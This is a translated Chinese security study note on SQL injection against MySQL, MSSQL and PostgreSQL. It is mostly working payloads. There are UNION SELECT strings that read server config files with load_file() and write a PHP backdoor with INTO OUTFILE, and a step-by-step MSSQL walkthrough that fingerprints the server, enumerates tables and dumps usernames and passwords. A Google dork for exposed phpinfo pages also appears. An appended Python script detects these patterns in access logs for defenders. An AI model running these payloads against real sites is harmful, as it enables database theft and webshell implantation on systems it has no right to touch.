Xiaodi Security Notes - 25
Kn1ght Day 25: Web Attack and Defense - Common Vulnerabilities - SQL Read/Write Injection - MySQL, MSSQL, PostgreSQL
Key points
1. SQL injection - MySQL database
2. SQL injection - MSSQL database
3. SQL injection - PostgreSQL database
Details
Access databases have no high-privilege injection point: you can only guess the data, and that means brute-force guessing.
MySQL, PostgreSQL and MSSQL have high-privilege injection points that can be escalated to file read/write, command execution and so on; whether that actually works depends on the specific restrictions in place (for example, whether file operations or execution are allowed at all).
MySQL's built-in file read/write functions:
Read a file: select load_file('d:/w.txt');
Write a file: select 'xxx' into outfile 'd:/1.txt'; or select 'xxx' into dumpfile 'd:/1.txt';
MySQL - exploiting root high privileges for read/write injection
Read a file:
UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Write a file:
UNION SELECT 1,'yyy',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile 'd:/www.txt'
Read key files; once you have them, you can go on to search them for key functions and so on.
Read a key configuration file:
http://localhost:81/book/news.php?id=1 UNION SELECT 1,load_file('D:/install/phpstudy_pro/WWW/book/config/conn.php'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Search syntax for phpinfo pages: inurl:phpinfo. A phpinfo page exposes the website's filesystem path.
Ways to obtain the website path: phpinfo, website error messages, a dictionary (wordlist) of common paths, reading configuration files with load_file(), and so on.
Common path references for load_file():
https://blog.csdn.net/god_7z1/article/details/8725541
After obtaining the website path, write backdoor code:
http://127.0.0.1:8081/web/mysql/news.php
?id=1 UNION SELECT 1,'',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile 'D:/install/phpstudy_pro/WWW/book/1.php'
PostgreSQL - high-privilege read/write injection
This article covers it well enough:
https://www.freebuf.com/sectool/249371.html
It is fairly detailed.
SQL Server - sa high-privilege read/write/execute injection
① Determine the number of columns:
http://xxx:41681/news.asp?id=2 order by 4   page displays normally
http://xxx:41681/news.asp?id=2 order by 5   page displays an error
So the column count is 4.
② Find the display (echo) position
- Wrap each of the nulls in ' ' in turn
http://xxx:41681/news.asp?id=2 and 1=2 union all select 'null',null,null,null
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,'null',null,null
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,'null',null   position 3 is the display position
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,null,'null'
③ Gather information:
Get version info: @@version
Get the current database name: db_name()
Get the current user name: user, system_user, current_user and user_name all work
Get server host info: @@SERVERNAME
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,@@version,null // get version info - SQL Server2005 - 9.00.1399.06
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,db_name(),null // get database name - mozhe_db_v2
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,user,null // get current user - dbo
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,@@SERVERNAME,null // get host info - MOBAN9527\SQL…
④ Query the table names in the database (database mozhe_db_v2):
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
Query the other tables in the database, excluding the "manage" table:
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null
Continue by querying the other tables, excluding both "manage" and "announcement":
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in (('manage'),('announcement'))),null,null
⑤ Since the manage table is the important one, query the column names under manage:
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null
⑥ Get the data: username and password
and 1=2 union all select null,username,password,null from manage
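As an added defender-side example (not part of the original notes), the script below flags the request patterns walked through above, namely the order by column probing, UNION SELECT with load_file() / into outfile, and the MSSQL fingerprinting and sysobjects enumeration, in web-server access-log lines. The log lines are constructed samples and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probes and payloads described in these notes.
# Matching runs on the URL-decoded, lower-cased request line so that
# %20 / + encoding does not hide the SQL keywords.
SIGNATURES = [
    ("column_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("mysql_file_read", re.compile(r"\bload_file\s*\(")),
    ("mysql_file_write", re.compile(r"\binto\s+(out|dump)file\b")),
    ("mssql_fingerprint", re.compile(r"@@(version|servername)\b|\bdb_name\s*\(")),
    ("mssql_schema_enum", re.compile(r"\bsysobjects\b|\bcol_name\s*\(")),
]

def classify_request(log_line: str) -> list[str]:
    """Return the signature tags that fire on one access-log line."""
    decoded = unquote_plus(log_line).lower()
    return [tag for tag, rx in SIGNATURES if rx.search(decoded)]

def scan_log(lines):
    """Map each flagged log line to its tags; benign lines are omitted."""
    hits = {}
    for line in lines:
        tags = classify_request(line)
        if tags:
            hits[line] = tags
    return hits

# Constructed sample log lines (Combined Log Format, not from the notes).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /book/news.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=2%20order%20by%205 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /book/news.php?id=1+UNION+SELECT+1,load_file(%27d:/w.txt%27),3 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /book/news.php?id=1+UNION+SELECT+1,%27x%27,3+into+outfile+%27D:/www/1.php%27 HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.asp?id=2+and+1=2+union+all+select+null,null,@@version,null HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line, tags in scan_log(SAMPLE_LOG).items():
        print(tags, line.split('"')[1])
```

On the MySQL side, whether load_file() and INTO OUTFILE work at all is decided by the FILE privilege and the secure_file_priv server setting, so SHOW VARIABLES LIKE 'secure_file_priv' is the quick server-side check to pair with this log review.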